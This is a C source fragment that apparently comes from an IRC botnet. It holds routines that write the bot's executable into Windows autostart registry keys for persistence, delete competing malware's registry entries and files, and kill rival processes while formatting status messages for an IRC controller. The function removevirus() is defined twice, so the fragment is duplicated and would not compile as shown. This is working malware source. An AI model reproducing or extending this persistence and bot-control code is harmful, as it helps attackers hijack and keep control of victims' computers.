void removevirus()
{
char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
unsigned char szDataBuf[128];
HKEY hkey;
LONG lRet;
DWORD dwSize = 128;
for (unsigned int i=0; viruses[i].subkey; i++) {
lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
fRegDeleteValue(hkey, viruses[i].value);
//FIXME: Replace the afw kill utils. we dont need to let that loop,
// when we removed the .exe and the reg key. mayb a static call
// to KillProcess(); can be inserted here. Something like:
// KillProcess(viruses[i].file);
GetSystemDirectory(sysdir, sizeof(sysdir));
sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
DeleteFile(virusexecuteble);
}
fRegCloseKey(hkey);
}
return;
}
void AutoStartRegs(char *nfilename)
{
HKEY key;
for (int i=0; i < (sizeof(autostart) / sizeof(AUTOSTART)); i++) {
fRegCreateKeyEx(autostart[i].hkey, autostart[i].subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
if (nfilename)
fRegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)nfilename, strlen(nfilename));
else
fRegDeleteValue(key, valuename);
fRegCloseKey(key);
}
return;
}
BOOL RegDelete(HKEY root,LPCTSTR subkey,LPCTSTR name)
{
HKEY key=NULL;
if (!subkey)
return FALSE;
if (!name)
{
if (fRegDeleteKey(root,subkey) == ERROR_SUCCESS)
return TRUE;
DWORD inx = 0;
DWORD chr = 256;
char buf[256] = {0};
FILETIME ftm;
if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS)
{
DWORD cnt = fRegEnumKeyEx(key,inx,buf,&chr,NULL,NULL,NULL,&ftm);
while ((cnt != ERROR_NO_MORE_ITEMS) && (cnt == ERROR_SUCCESS)) {
RegDelete(root,subkey,buf);
cnt = fRegEnumKeyEx(key,(inx++),buf,&chr,NULL,NULL,NULL,&ftm);
}
fRegDeleteKey(key,subkey);
}
}
else
{
if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS)
{
if (fRegDeleteValue(key,name) == ERROR_SUCCESS)
{
fRegCloseKey(key);
return TRUE;
}
fRegCloseKey(key);
}
}
return FALSE;
}
void removevirus()
{
char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
unsigned char szDataBuf[128];
SOCKET sock;
HKEY hkey;
char sendbuf[IRCLINE];
char current[20];
LONG lRet;
sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
DWORD dwSize = 128;
for (unsigned int i=0; viruses[i].subkey; i++) {
lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
fRegDeleteValue(hkey, viruses[i].value);
strcpy(current,viruses[i].file);
//FIXME: Replace the afw kill utils. we dont need to let that loop,
// when we removed the .exe and the reg key. mayb a static call
// to KillProcess(); can be inserted here. Something like:
if(listProcesses(sock,NULL,FALSE,current) == 1)
sprintf(sendbuf,"[PROC]: Process killed: %s",viruses[i].file);
else
sprintf(sendbuf,"[PROC]: Failed to terminate process: %s", viruses[i].file);
//KillProcess(viruses[i].file);
GetSystemDirectory(sysdir, sizeof(sysdir));
sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
DeleteFile(virusexecuteble);
}
fRegCloseKey(hkey);
}
sprintf(sendbuf,"[AV]: Antivirus search complete! ");
return;
}
